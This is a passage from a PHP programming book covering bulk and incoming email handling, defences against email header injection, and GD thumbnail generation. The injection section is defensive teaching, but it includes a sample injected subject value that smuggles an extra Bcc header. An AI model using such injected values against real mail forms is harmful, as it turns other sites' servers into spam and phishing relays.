    if (PEAR::isError($succ))
    {
      echo 'Email sending failed: ' . $succ->getMessage();
    }
    else
    {
      echo 'Email sent successfully';
    }
    ?>

The output of this code can be seen in Figure 7.1.
  • 212.
Figure 7.1. Displaying the multipart message

How do I mail a message to a group of people?

In many cases, it's useful to be able to mail a message to more than one person at a time: for example, if you're sending a newsletter, a message to a group mailing list, a site update notification to the IT staff, a feature freeze notification to a development team, and so on. However, in certain circumstances, sending unsolicited email to a group of people can also be called spamming, something I'm sure you won't be doing with PHP!

If you're using PEAR::Mail_Mime, you have the option to send group email by adding BCC or CC headers to the email message. This approach may not suit your requirements, though: listing all the addresses from an especially large distribution list in the header of a single email can quickly overwhelm your email server. A better approach is to send each email individually, reusing the same instance of the PEAR::Mail_Mime class for each new message.
  • 213.
Solution

In this hypothetical example, we'll retrieve a list of names and email addresses from a discussion forum's member database, and reuse one instance of the PEAR::Mail_Mime class to send an email to each of those addresses:

group.php (excerpt)

    <?php
    error_reporting(E_ALL);
    require 'Mail.php';
    require 'Mail/mime.php';
    /* create the email */
    $mime = new Mail_Mime("\r\n");
    $mime->addAttachment('php.gif', 'image/gif');
    $header = array(
      'From' => 'me@mydomain.com',
      'Subject' => 'Forum Newsletter'
    );
    $mail = Mail::factory('smtp', array('host'=>'smtp.mydomain.net'));
    /* go to the database to get the member information */
    $dsn = 'mysql:host=localhost;dbname=forum;';
    $user = 'user';
    $password = 'secret';
    try
    {
      $dbh = new PDO($dsn, $user, $password);
      $dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
      $sql = 'SELECT member_email, firstname, lastname FROM member';
      /* cycle through the list sending the custom emails */
      foreach ($dbh->query($sql) as $row)
      {
        $mime->setTXTBody(
            "Howdy {$row['firstname']} {$row['lastname']}");
        $body = $mime->get();
        $hdrs = $mime->headers($header);
        $succ = $mail->send($row['member_email'], $hdrs, $body);
        if (PEAR::isError($succ))
  • 214. 190 The PHP Anthology { error_log("Email not sent to {$row['member_email']}: " . $succ->getMessage()); } } } catch (PDOException $e) { echo 'PDO Exception Caught. '; echo 'Error with the database: <br />'; echo 'SQL Query: ', $sql; echo 'Error: ' . $e->getMessage(); } ?> In the above example, we instantiate the PEAR::Mail_Mime object and set up the message and its sender. We then go to our hypothetical member database and retrieve each member’s email address, first name, and last name. Then, using that result set, we add a custom welcome message to the email, build the message, set the headers, and send the email to that user’s email address. Discussion For very large distribution lists, a simple foreach loop won’t quite cut it—you’ll risk flooding your mail server with messages! Instead, you’ll need to devise a means of sending the messages at a rate that your server can handle. The simplest way to achieve this is to use the PHP sleep function to pause your script every ten messages or so. You’ll also need to use the set_time_limit function to allow your script to run for more than the default thirty-second limit. Lastly, don’t forget to contact your hosting service to see if they have set any limitations or restrictions to which you must adhere. Some hosting services place a strict limit on the number of emails that can be sent per hour, in an effort to protect themselves from being seen as spammers. Complying with Anti-spam Legislation In the United States (at the state and federal level), laws have been passed regarding unsolicited emails and spam. The USA has the federal CAN-SPAM Act of 2003 as well as numerous individual state laws, and these may affect what you include
  • 215. Email 191 in, and how you send, your emails. The USA is not the only country to pass such laws, of course—countries in the European Union, Asia, South America, and so on around the globe have also put anti-spam legislation in place. For more information, visit the Spam Laws web site (though it is not a definitive listing),5 and see your local government web site. How do I handle incoming mail with PHP? You’ve already seen that sending mail with PHP is no problem. But what about dealing with incoming mail using PHP? If your site is hosted on a Linux system, you’ll be happy to hear that with a little tuning, it’s easy to have PHP examine incoming email. Solution In this solution, I’ll assume that you have your site hosted on a Linux-based system, that you have command prompt access to the server and are able to run PHP from the command prompt, and that you’re using sendmail to handle email on the server. Phew! It’s a long list of requirements, I know, but this fairly common configuration greatly simplifies matters. First things first: you need to place a file called .forward in your home directory. Use a text editor to write the following to the file (all on one line): you@yoursite.com "|/home/yourUserName/mailhandler.php" Now, within the PHP script mailhandler.php, you can process incoming email for the you@yoursite.com email address in any way you like. Here’s an example script that detects incoming email from a particular address and sends a second notification email in response: mailhandler.php (excerpt) #!/usr/bin/php <?php // Read the whole email from standard input $fp = fopen('php://stdin', 'r'); $email = stream_get_contents($fp); 5 http://www.spamlaws.com/
  • 216. 192 The PHP Anthology fclose($fp); // Break the email up by linefeeds $email = explode("\n", $email); // Initialize vars $numLines = count($email); $from = ''; for ($i = 0; $i < $numLines; $i++) { // Watch out for the From header if (preg_match("/^From: (.*)/", $email[$i], $matches)) { $from = $matches[1]; break; } } // Forward the message to the hotline email if (strstr($from, 'vip@example.com')) { mail('you@yourdomain.com', 'Urgent Message!', 'Check your mail!'); } ?> Discussion The .forward file tells the mail system on the server that any email that’s headed for you@yoursite.com not only needs to be delivered to that address, but must also be sent to the PHP script at /home/yourUserName/mailhandler.php. The PHP script that’s given in this solution is intended to be run automatically by the mail system—not by your web server. The first line of the file must point to the location of the standalone PHP program on your server (commonly /usr/bin/php) and is known as the shebang. After that, the code fetches the email from standard input and manipulates it. There are a number of ways in which you can manipulate an inbound email. First of all, you have the simple string functions we used above, which are built into PHP. The IMAP extension and the MailParse extension are also available. And in PEAR, you can use the Mail_Mime package (Mail_mimeDecode, to be specific) as well.6 6 For an example of Mail_mimeDecode in action, see http://pear.php.net/manual/en/package.mail.mail-mimedecode.example.php.
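The header search described above can also be sketched as two small functions, which makes it easier to try out without a live mail system. This is only a minimal sketch: the names readRawEmail and extractFromHeader are hypothetical, and it assumes that the first From line in the header block is the one you care about and that the header is not folded across several lines.

```php
<?php
// Hypothetical helper: read an entire message from an already opened stream.
function readRawEmail($stream)
{
    // stream_get_contents reads until end-of-file, which suits a pipe
    // whose length is not known in advance.
    return stream_get_contents($stream);
}

// Hypothetical helper: return the first From header value, or null.
function extractFromHeader($rawEmail)
{
    // Headers end at the first blank line, so only that part is searched.
    $parts = preg_split('/\r?\n\r?\n/', $rawEmail, 2);

    // "m" lets ^ and $ match at line boundaries; "i" ignores case.
    if (preg_match('/^From:[ \t]*(.*)$/mi', $parts[0], $matches)) {
        return trim($matches[1]);
    }
    return null;
}

// In mailhandler.php this might be used as:
//   $from = extractFromHeader(readRawEmail(STDIN));
```

Restricting the search to the header block means a line that begins with "From:" inside the message body is not mistaken for the sender.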
  • 217. Email 193 A Solution Looking for a Problem? The value that being able to handle incoming emails with PHP provides may not be obvious at first. But if you’ve ever read the SitePoint “TechTimes,”7 you know the answer—whether you realize it or not! The actions of subscribing to, and unsubscribing from, that mailing list are handled by PHP. You could also use PHP to build spam filters, to allow users to submit updates to the versioning system of your application via emails sent to a special address (with proper authentication of course), and to create a whole host of other applications. How can I protect my site against email injection attacks? An email injection attack occurs when a cracker uses your web site’s email form to send email in a way you never intended—either by spoofing your form, or using a script to fill out the form and submit it. A few nastier examples of this sort of behavior include sending spam through your form, mailing mass email using your bandwidth, or sending emails that pretend to be from you in a phishing attempt. These kinds of attacks can have consequences—they may be as simple as receiving a warning from your hosting provider, or as problematic as paying higher costs for bandwidth, suffering the revocation of your email privileges by the hosting company, or being blacklisted as a known spammer. By using PHP’s mail function to handle your site’s mail form, you open yourself to the possibility of an email injection attack not because of a fault in the PHP mail function, but because of the MIME and SMTP standards. Without getting into the details of those standards, you should know that all it takes for a cracker to gain control of your email form is for them to be able to add to or manipulate the message’s original header. A craftily added new line character or additional header line is all it takes. 
Luckily, when you get right down to it, basic protection from an email injection attack is incredibly simple to implement: do not allow new lines in the user input that’s used in email headers. Despite the ease with which attacks are avoided using this technique, many developers fail to implement it. 7 http://www.sitepoint.com/newsletter/
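To make the attack concrete, here is a minimal sketch of what an injected value might look like and how stripping new lines defuses it. The function names containsHeaderInjection and stripHeaderNewlines, and the sample payload, are assumptions made for illustration only.

```php
<?php
// Hypothetical helper: true if the value contains a carriage return or
// line feed, either of which could start a new header line.
function containsHeaderInjection($value)
{
    return preg_match('/[\r\n]/', $value) === 1;
}

// Hypothetical helper: collapse each run of new line characters into a
// single space so the value can only ever occupy one header line.
function stripHeaderNewlines($value)
{
    return trim(preg_replace('/[\r\n]+/', ' ', $value));
}

// A subject field that tries to smuggle in an extra Bcc header.
$malicious = "Hello\r\nBcc: victim1@example.com,victim2@example.com";

var_dump(containsHeaderInjection($malicious)); // bool(true)
echo stripHeaderNewlines($malicious), "\n";
// Hello Bcc: victim1@example.com,victim2@example.com
```

After stripping, the would-be Bcc line is just harmless text inside the subject. Whether to clean the value or reject the whole submission is a design choice; rejecting is stricter, since a new line in a subject or address field is rarely legitimate.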
  • 218. 194 The PHP Anthology Diving into the Details If you need more details on the SMTP and MIME protocols, search the Web for light-weight information, or go straight to the source by reading the relevant RFCs (Requests for Comments) at the Internet Engineering Task Force web site. For information on SMTP, see: ■ http://www.ietf.org/rfc/rfc0821.txt And for information on the MIME protocol, visit: ■ http://www.ietf.org/rfc/rfc2045.txt ■ http://www.ietf.org/rfc/rfc2046.txt ■ http://www.ietf.org/rfc/rfc2047.txt ■ http://www.ietf.org/rfc/rfc2048.txt ■ http://www.ietf.org/rfc/rfc2049.txt Solution Here’s an example that shows how to remove new lines from user input: attack.php (excerpt) <?php $error = FALSE; if (isset($_POST['submit'])) { $to = 'me@mydomain.com'; /* replace new lines with a space; this prevents a user from adding headers */ $subject = preg_replace('/[\r\n]+/', " ", $_POST['subject']); $from = preg_replace('/[\r\n]+/', " ", $_POST['from']); /* basic validation for subject and email address: reject a subject containing any character outside the allowed set */ $emailPattern = '/^[\w.\-]+@([\w\-]+\.)+[\w\-]{2,4}$/'; if (preg_match('/[^\w .!?*%$#]/', $subject) || !preg_match($emailPattern, $from)) { $error = "Invalid input. Try again."; } if ($error === FALSE &&
  • 219. Email 195 mail($to, $subject, $_POST['message'], "FROM: $from")) { $error = "Message Sent"; } else { $error .= " We could not send your message. Sorry"; } } ?> Discussion As I mentioned, setting up basic protection from email injection attacks is as simple as removing any new lines from the user input, but you can gain additional protection by validating the user input that will be used in the header of the email—that is, by validating any text that will appear in the to, from or subject headers. In the solution provided here, I used the preg_replace function to search for one or more new line characters (\r or \n), and replace them with a single space. I also validated the From address and the email Subject line to ensure that they contain legitimate values. The validation aspect is more difficult to explain, since it uses Perl-compatible regular expressions (also known as “pcre”) and is unfortunately beyond the scope of this section of the book. Luckily, there are plenty of resources available online to help you.8 Sites that provide additional information on email injection attacks include: ■ http://www.securephpwiki.com/index.php/Email_Injection ■ http://www.mailinjection.com/ ■ http://www.nyphp.org/phundamentals/email_header_injection.php Summary Email is a critical element of any business or web site. It provides a simple, easy way to communicate with your customers, visitors, coworkers, and even your 8 For more information on PHP’s implementation of pcre go to http://www.php.net/pcre/. For additional general information on regular expressions, check out http://www.regular-expressions.info/ on the Web.
  • 220. 196 The PHP Anthology server. Hopefully, this chapter has thrown a little light on some of the ways you can harness the power of PHP, and the flexibility of the PEAR::Mail and PEAR::Mail_Mime classes, to easily create and receive emails. Now go forth and use that power—to send newsletters, server updates, information, and visitor feedback—for good and not evil!
  • 221. Chapter 8: Images Building a web site can extend your creativity far beyond a display of (X)HTML formatted text, if you so choose. The umbrella term multimedia describes the delivery of many forms of content to your desktop, including sound, text, images, animation, and movies. Where images are concerned, PHP has great capabilities—you can use it to do a whole lot more than simply add static images to your HTML. Would you like to be able to add a watermark to your images, create appropriately sized thumbnails for your web page, or build a graph based on figures stored in your database? Would you like to do all that automatically and on the fly, using nothing but PHP? We’ll cover all this and more in the following pages. To use the examples here, you’ll need the GD image library for PHP. I’ll assume you have GD version 2.0 or higher (bundled with the latest versions of PHP) with FreeType, JPEG, GIF, and PNG support built in. The PHP functions that use the GD library are documented in The PHP Manual.1 The year 2004 saw the end of patent issues with GIF images, and support for this format in the GD library has been re-enabled since version 2.0.28, which was released with version 4.3.9 of PHP. 1 http://www.php.net/gd/
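Since the examples assume a GD build with FreeType, JPEG, GIF, and PNG support, it can be worth checking what your own installation offers before going further. The following is a minimal sketch that uses PHP’s gd_info function; the helper name describeGdSupport and the shape of the array it returns are assumptions made for illustration.

```php
<?php
// Hypothetical helper: summarize the GD features this PHP build reports.
function describeGdSupport()
{
    if (!extension_loaded('gd')) {
        return array('loaded' => false);
    }

    $info = gd_info();

    return array(
        'loaded'   => true,
        'version'  => isset($info['GD Version']) ? $info['GD Version'] : 'unknown',
        // !empty treats a missing key the same as an unsupported feature.
        'freetype' => !empty($info['FreeType Support']),
        'jpeg'     => !empty($info['JPEG Support']),
        'png'      => !empty($info['PNG Support']),
        'gif'      => !empty($info['GIF Create Support']),
    );
}

print_r(describeGdSupport());
```

If any of the entries come back false, the corresponding examples in this chapter are likely to fail with an undefined function error.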
  • 222. 198 The PHP Anthology Although the GD library supports GIF images again, it’s worth noting that PNG is capable of supporting alpha channel transparency and full 64-bit images, compared with GIF’s 8 bits. In addition, PNG uses a more efficient compression algorithm, reducing the amount of bandwidth required. While this chapter focuses on the technical details of creating, manipulating, and using images and related libraries, you might also like to brush up on the basics. Mike Doughty has a great introduction to working with images and graphics on his web site.2 How do I specify the correct image MIME type? MIME stands for Multipurpose Internet Mail Extensions, a standard originally conceived to help identify different email content types. MIME has since become the de facto standard for the description of content types on the Internet. When you work with images in PHP, it’s important to have a grasp of the different content types, or you may end up struggling for hours with what’s actually a simple problem. Solution Generally speaking, your web server must announce content type by way of a special Content-Type header before it sends requested content to the user’s browser, so that the browser knows what to do with the content. For example, here are the headers that a server might send to announce an image in Portable Network Graphics (PNG) format: HTTP/1.1 200 OK Date: Fri, 28 Mar 2003 21:42:44 GMT Server: Apache/1.3.27 (Unix) PHP/4.3.1 Last-Modified: Wed, 26 Feb 2003 01:27:19 GMT Content-Length: 1164 Connection: close Content-Type: image/png 2 http://www.sketchpad.net/readme.htm
  • 223. Images 199 The Content-Type header is used to specify the MIME type of the content served in response to a request for the current URL. In this case, the MIME type is image/png, which signifies a PNG image. It’s when we generate an image from a PHP script that the MIME type becomes important in PHP. By default, PHP scripts send a MIME type of text/html (denoting an HTML document). So, in instances when your script is sending an image instead of HTML, you’ll need to specify the MIME type with PHP’s header function. Here’s an example: <?php header('Content-Type: image/png'); ?> A list of the common MIME types you’ll need for images is shown in Table 8.1.
Table 8.1. MIME Types for Images
Image Format                                  MIME Type
JPEG File Interchange Format (.jpeg/.jpg)     image/jpeg (a)
Portable Network Graphics (.png)              image/png
Graphics Interchange Format (.gif)            image/gif
Windows Bitmap (.bmp)                         image/bmp
Scalable Vector Graphics (.svg)               image/svg+xml
(a) Internet Explorer understands the image/jpeg type, but when uploading a JPEG image, it sends a type of image/pjpeg.
How do I create thumbnail images? If your site will allow images to be uploaded, perhaps for display with submitted content, how can you make sure the images displayed will be of a suitable size? If a user uploads a particularly large image, it might destroy the layout of the page when it’s displayed. Solution One solution to this problem is to create thumbnail images, which guarantee that the images displayed never exceed certain height and width values.
  • 224. 200 The PHP Anthology Building a basic thumbnail is a five-stage process: 1. Load the source image into a PHP variable. 2. Determine the height and width of the original image. 3. Create a blank thumbnail image of the correct size. 4. Copy the original image to the blank thumbnail. 5. Display the thumbnail using the correct content type. Let’s create a thumbnail from a photo in JPEG format. First, we specify the path to the source image, as well as our desired width and height in pixels: thumb.php (excerpt) <?php $sourceImage = 'sample_images/terrier.jpg'; $thumbWidth = 200; $thumbHeight = 200; Next, we use imagecreatefromjpeg to load an image from the file system into a PHP variable: $original. The getimagesize function returns the width and height of the image (we’ll discuss getimagesize further in “How do I resize images without stretching them?”): thumb.php (excerpt) $original = imagecreatefromjpeg($sourceImage); $dims = getimagesize($sourceImage); We then use the imagecreatetruecolor function to create a blank image (in memory, as PHP variable $thumb) into which the thumbnail image will be placed: thumb.php (excerpt) $thumb = imagecreatetruecolor($thumbWidth,$thumbHeight); As the function name suggests, imagecreatetruecolor creates a true color (24-bit) image, as opposed to the palette-based (8-bit) image that the imagecreate function provides. The imagecreatefromjpeg function we used previously creates a true color image from the source file, so we need the thumbnail to be true color as well.
  • 225. Images 201 The next line in the example code is the point at which the thumbnail image is ac­ tually created from the original: thumb.php (excerpt) imagecopyresampled( $thumb, $original, 0, 0, 0, 0, $thumbWidth, $thumbHeight, $dims[0], $dims[1] ); The imagecopyresampled function places a resized version of the image into the blank thumbnail image, resampling along the way to ensure that the image is resized smoothly. An older version of this function, imagecopyresized, changes the size of the image more crudely. The first two arguments to the function represent the destination image, $thumb, and the source image, $original. The imagecopyresampled function is quite flexible and can be used to copy a portion of one image into another. The next four arguments refer to the x and y coordinates of the destination and source image portions, taken from the top-left corner. As we’re only interested in copying the whole image, we supply 0 for all four arguments. The final four arguments represent the width and height of the destination and source image portions. Again, as we wish to copy the whole image, we supply the full dimensions of each image. Refer to The PHP Manual for more information.3 Finally, after we’ve sent the correct content type header, Content-type: image/jpeg, we use imagejpeg to output the completed thumbnail: thumb.php (excerpt) header( "Content-type: image/jpeg" ); imagejpeg( $thumb ); ?> Figure 8.1 shows the end result. 3 http://www.php.net/imagecopyresampled/
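Because imagecopyresampled can copy a portion of the source image, the same call can produce a cropped thumbnail instead of a stretched one. The sketch below only computes the source rectangle for a centered square crop; the helper name centerSquareCrop is hypothetical, and the commented call reuses the $thumb, $original, $thumbWidth, and $thumbHeight variables from thumb.php.

```php
<?php
// Hypothetical helper: work out the largest centered square inside an
// image of the given size, as a source rectangle for imagecopyresampled.
function centerSquareCrop($width, $height)
{
    $size = min($width, $height);

    return array(
        'x'    => (int) floor(($width - $size) / 2),
        'y'    => (int) floor(($height - $size) / 2),
        'size' => $size,
    );
}

$box = centerSquareCrop(600, 450);
// $box is array('x' => 75, 'y' => 0, 'size' => 450)

// With thumb.php's variables, the crop would be copied like this:
//   imagecopyresampled($thumb, $original, 0, 0, $box['x'], $box['y'],
//       $thumbWidth, $thumbHeight, $box['size'], $box['size']);
```

Here the source x and y arguments move away from 0, and the source width and height shrink to the square, while the destination arguments still describe the whole thumbnail.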
  • 226. 202 The PHP Anthology Figure 8.1. Our first thumbnail While there’s certainly room for improvement, this is a start. How do I resize images without stretching them? Unless the original and thumbnail images happen to share the same width-to-height ratio (or aspect ratio), the process of resizing the images to generate your thumbnails will warp the dimensions of the images. What we really want is a proportionally scaled version of the original, which fits into the blank thumbnail as neatly as pos­ sible. Solution It’s possible to determine the original image’s dimensions and use these to calculate the proportional dimensions of the thumbnails. The getimagesize function returns an array of useful information about an image. Here’s an example: <?php $sourceImage = 'sample_images/terrier.jpg'; $dims = getimagesize($sourceImage); echo ( '<pre>' ); print_r($dims); echo ( '</pre>' ); ?> The above example will display the contents of the $dims variable:
  • 227. Images 203 Array ( [0] => 600 [1] => 450 [2] => 2 [3] => width="600" height="450" [bits] => 8 [channels] => 3 [mime] => image/jpeg ) The first element of the array is the width of the image; the second is its height. The third array element is a number that identifies the type of image, for which a 1 indicates the image is a GIF, 2 indicates a JPEG, and 3 a PNG—more values are described in The PHP Manual.4 The fourth array element contains a string that’s intended to be used within HTML <img> tags. The bits element contains the color depth.5 The channels element contains a value of 3 for RGB color images and 4 for CMYK.6 The mime element contains the MIME type. In this section, we’ll write a class called Thumbnail that allows the generation of proportionally scaled images. The class will also make it possible for us to deal with images that are smaller than the thumbnail size, allowing them to be left at their original size if required. The class will be designed to handle PNG, JPEG, and GIF files, but can easily be modified to handle other formats. We need to define some custom exceptions for our error handling needs before we start to create our Thumbnail class: Thumbnail.class.php (excerpt) class ThumbnailException extends Exception { public function __construct($message = null, $code = 0) { parent::__construct($message, $code); 4 http://www.php.net/getimagesize/ 5 Eight bits can represent 256 colors, and 8-bit color is known as indexed color. True, or 24-bit color can represent 16,777,216 colors. 6 The RGB (Red-Green-Blue) color model is used for computer displays, while CMYK (Cyan-Magenta-Yellow-blacK) is used for printing.
  • 228. 204 The PHP Anthology error_log('Error in '.$this->getFile(). ' Line: '.$this->getLine(). ' Error: '.$this->getMessage() ); } } class ThumbnailFileException extends ThumbnailException {} class ThumbnailNotSupportedException extends ThumbnailException {} Our base custom exception class, ThumbnailException, ensures the exception details are logged using the error_log function. The subclasses represent different exception situations that might arise during the creation of the thumbnail. As with any class, we start with the class properties: Thumbnail.class.php (excerpt) class Thumbnail { private $maxWidth; private $maxHeight; private $scale; private $inflate; private $types; private $imgLoaders; private $imgCreators; private $source; private $sourceWidth; private $sourceHeight; private $sourceMime; private $thumb; private $thumbWidth; private $thumbHeight; $maxWidth, $maxHeight, $scale, $inflate, $types, $imgLoaders, and $imgCreators are set by the constructor and are described below. $source, $sourceWidth, $sourceHeight, and $sourceMime represent the properties of the source image and will be set by the image loading methods described below. $thumb, $thumbWidth, and $thumbHeight represent the properties of the created thumbnail and are also described below.
  • 229. Images 205 Next, we create a class constructor: Thumbnail.class.php (excerpt) public function __construct($maxWidth, $maxHeight, $scale = true, $inflate = true) { $this->maxWidth = $maxWidth; $this->maxHeight = $maxHeight; $this->scale = $scale; $this->inflate = $inflate; The constructor for the Thumbnail class takes four arguments. The first two are the maximum width and height of the thumbnail in pixels, respectively. The third ar­ gument tells the Thumbnail object whether it should scale the image to the thumbnail proportionally, or just stretch it, as with the earlier example. The fourth argument tells the Thumbnail object what to do with images that are too small; that is, whether to blow them up to fill the thumbnail. With those arguments safely stored in instance variables, we can create the rest of the constructor: Thumbnail.class.php (excerpt) $this->types = array('image/jpeg', 'image/png', 'image/gif'); $this->imgLoaders = array( 'image/jpeg' => 'imagecreatefromjpeg', 'image/png' => 'imagecreatefrompng', 'image/gif' => 'imagecreatefromgif' ); $this->imgCreators = array( 'image/jpeg' => 'imagejpeg', 'image/png' => 'imagepng', 'image/gif' => 'imagegif' ); } The $this->types property stores an array of the MIME types that this class can handle. The $this->imgLoaders property stores the names of the functions used to load images of those MIME types, while the $this->imgCreators property stores the names of the functions for creating new images of those types.
  • 230. 206 The PHP Anthology The Thumbnail class provides two methods for loading the image you want to con­ vert. The first, loadFile, allows you to specify a local file to load: Thumbnail.class.php (excerpt) public function loadFile ($image) { if (!$dims = @getimagesize($image)) { throw new ThumbnailFileException( 'Could not find image: '.$image); } if (in_array($dims['mime'],$this->types)) { $loader = $this->imgLoaders[$dims['mime']]; $this->source = $loader($image); $this->sourceWidth = $dims[0]; $this->sourceHeight = $dims[1]; $this->sourceMime = $dims['mime']; $this->initThumb(); return true; } else { throw new ThumbnailNotSupportedException( 'Image MIME type '.$dims['mime'].' not supported'); } } The loadFile method uses the getimagesize function to grab all the required image properties, including width, height, and MIME type. If getimagesize returns false, an error has occurred and we throw one of our custom exceptions, ThumbnailFileException. If the MIME type of the image is not on our list of sup­ ported types, we throw a ThumbnailNotSupportedException. If all’s well, we load the image via the image loading function that’s appropriate for the MIME type, and assign it to the $this->source property. We also assign the image width to the $this->sourceWidth property, the image height to the $this->sourceHeight property, and MIME type to the $this->sourceMime property. After all the instance variables are set, the method calls the initThumb method, which we’ll tackle in a moment. Finally, having no exceptions, the method returns true.
  • 231. Images 207 The loadData method performs the same function as loadFile, except that we load an image from a string rather than a file. The string might come from a database, for example. Here’s our loadData method: Thumbnail.class.php (excerpt) public function loadData ($image, $mime) { if ( in_array($mime,$this->types) ) { if($this->source = @imagecreatefromstring($image)) { $this->sourceWidth = imagesx($this->source); $this->sourceHeight = imagesy($this->source); $this->sourceMime = $mime; $this->initThumb(); return true; } else { throw new ThumbnailFileException( 'Could not load image from string'); } } else { throw new ThumbnailNotSupportedException( 'Image MIME type '.$mime.' not supported'); } } While the loadData method performs the same function and sets the same instance variables as the loadFile method, the functions it uses are not the same as loadFile’s. The loadData method first uses the imagecreatefromstring function to load the image, throwing a ThumbnailFileException if the image cannot be cre­ ated. The imagecreatefromstring will return an image resource obtained from the string data passed to the function in the argument. The width and height of our source images are obtained by the imagesx and imagesy functions, which, predict­ ably, return an image’s width and height. In addition to the image data, you also need to supply the MIME type as the second argument to the loadData method. Next, the buildThumb method is used to render the finished thumbnail:
  • 232. 208 The PHP Anthology Thumbnail.class.php (excerpt) public function buildThumb($file = null) { $creator = $this->imgCreators[$this->sourceMime]; if (isset($file)) { return $creator($this->thumb, $file); } else { return $creator($this->thumb); } } If you pass this method a filename, the thumbnail will be stored as a file that uses the name you’ve specified. Otherwise, the image is output directly to the browser, so you’ll need to make sure that you’ve sent the correct HTTP header first, which you’ll see in the usage example that follows the Thumbnail class description. Notice that we use the image function names we assigned to the $this->imgCreators property in the constructor. The final public methods are used to glean information about the thumbnail. The getMime method returns the MIME type, which can be used to generate a Content- Type header for the thumbnail: Thumbnail.class.php (excerpt) public function getMime() { return $this->sourceMime; } The getThumbWidth and getThumbHeight methods are used to return the width and height of the thumbnail in pixels; you could use that information to create an HTML img tag, for example: Thumbnail.class.php (excerpt) public function getThumbWidth() { return $this->thumbWidth; } public function getThumbHeight()
  • 233. Images 209 { return $this->thumbHeight; } Our class has a private method, called initThumb, that’s called by the loading methods I described previously. initThumb handles the scaling and inflating func­ tions of our class. The first step is to handle scaling: Thumbnail.class.php (excerpt) private function initThumb () { if ( $this->scale ) { if ( $this->sourceWidth > $this->sourceHeight ) { $this->thumbWidth = $this->maxWidth; $this->thumbHeight = floor( $this->sourceHeight * ($this->maxWidth/$this->sourceWidth) ); } else if ( $this->sourceWidth < $this->sourceHeight ) { $this->thumbHeight = $this->maxHeight; $this->thumbWidth = floor( $this->sourceWidth * ($this->maxHeight/$this->sourceHeight) ); } else { $this->thumbWidth = $this->maxWidth; $this->thumbHeight = $this->maxHeight; } } This part of the function will check to ascertain whether or not image scaling is re­ quired. If it is, some calculations will be performed to determine the appropriate size for the thumbnail so that it matches the width and height ratio of the original
  • 234. 210 The PHP Anthology image, constraining the longest axis to the maximum size originally supplied to the constructor. If scaling isn’t required, we simply use the $maxWidth and $maxHeight values originally supplied to the constructor: Thumbnail.class.php (excerpt) else { $this->thumbWidth = $this->maxWidth; $this->thumbHeight = $this->maxHeight; } The next step is to create our blank thumbnail image by employing the imagecreatetruecolor function: Thumbnail.class.php (excerpt) $this->thumb = imagecreatetruecolor( $this->thumbWidth, $this->thumbHeight ); The final step in our initThumb method is to copy the source image into our thumbnail image: Thumbnail.class.php (excerpt) if ( $this->sourceWidth <= $this->maxWidth && $this->sourceHeight <= $this->maxHeight && $this->inflate == false ) { $this->thumb = $this->source; /* keep the reported size in step with the image we actually return */ $this->thumbWidth = $this->sourceWidth; $this->thumbHeight = $this->sourceHeight; } else { imagecopyresampled( $this->thumb, $this->source, 0, 0, 0, 0, $this->thumbWidth, $this->thumbHeight, $this->sourceWidth, $this->sourceHeight );
  • 235. Images 211 } } } If the source image is smaller than the specified thumbnail image size and the inflate property is set to false, the thumb property is set to the original image. Otherwise, the imagecopyresampled function is used to resample the source image into the blank thumbnail image. We talked about the imagecopyresampled function in more detail in “How do I create thumbnail images?”. That’s it for our class! Let’s take it for a spin. Here’s a quick demonstration that outputs a thumbnail based on a file: thumbFromFile.php (excerpt) <?php require_once('Thumbnail.class.php'); $tn = new Thumbnail(200,200); $tn->loadFile('sample_images/terrier.jpg'); header('Content-Type: '.$tn->getMime()); $tn->buildThumb(); ?> First, we instantiate a Thumbnail object, specifying that we want our thumbnail to have dimensions of 200×200px. Then we call the loadFile method and pass it a filename. We use the PHP header function together with the getMime method to send the correct HTTP header; then, we simply call the buildThumb method to dis­ play the image. The result of our work is shown in Figure 8.2. Figure 8.2. A proportionally scaled thumbnail Here’s another example to show off the loadData method and illustrate how files can be stored rather than output directly:
  • 236. 212 The PHP Anthology beforeAndAfter.php (excerpt) <?php require_once('Thumbnail.class.php'); $tn = new Thumbnail(200, 200); $image = file_get_contents('sample_images/terrier.jpg'); $tn->loadData($image, 'image/jpeg'); $tn->buildThumb('sample_images/nice_doggie.jpg'); ?> We begin by including our class and instantiating our Thumbnail object. We simulate a source image string with the file_get_contents function. In a real-world situation, of course, this string would probably come from a database. We use the loadData method to load our image string and call the buildThumb method, but this time we also pass a filename argument to make the method save our thumbnail to a file at sample_images/nice_doggie.jpg. Next comes the HTML for our example page: beforeAndAfter.php (excerpt) <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Thumbnail Example </title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <style type="text/css"> div { float: left; } </style> </head> <body> <div> <h1>Before...</h1> <p> <img src="sample_images/terrier.jpg" alt="Original Image" /> </p> </div> <div> <h1>After...</h1> <p> <img src="sample_images/nice_doggie.jpg"
  • 237. Images 213 width="<?php echo ( $tn->getThumbWidth() );?>" height="<?php echo ( $tn->getThumbHeight() );?>" alt="Resized Image" /> </p> </div> </body> </html> Notice that as we generate the image tag for the thumbnail, we use the getThumbWidth and getThumbHeight methods to complete the <img> tag’s width and height attributes. The resulting page can be seen in Figure 8.3. Figure 8.3. The image before and after resizing There, now Rover looks cute at any size!
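The arithmetic behind a proportionally scaled thumbnail can be sketched as a small standalone function. This is only an illustration under stated assumptions: the function name scaledDimensions and its $inflate flag are hypothetical and are not taken from the Thumbnail class itself.

```php
<?php
/**
 * Hypothetical helper (not part of the Thumbnail class): fit a source
 * image of $srcW x $srcH inside a $maxW x $maxH box, keeping proportions.
 */
function scaledDimensions($srcW, $srcH, $maxW, $maxH, $inflate = true)
{
    // The smaller ratio wins, so neither side can exceed the box
    $ratio = min($maxW / $srcW, $maxH / $srcH);

    // Leave small images untouched when inflation is disabled
    if (!$inflate && $ratio > 1) {
        return array($srcW, $srcH);
    }

    // Round to whole pixels, never dropping below 1px
    return array(
        max(1, (int) round($srcW * $ratio)),
        max(1, (int) round($srcH * $ratio)),
    );
}

list($w, $h) = scaledDimensions(800, 600, 200, 200);
echo "{$w}x{$h}\n"; // prints "200x150"
```

Values computed this way are the kind of numbers you would expect to see in the width and height attributes of the resized image tag.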
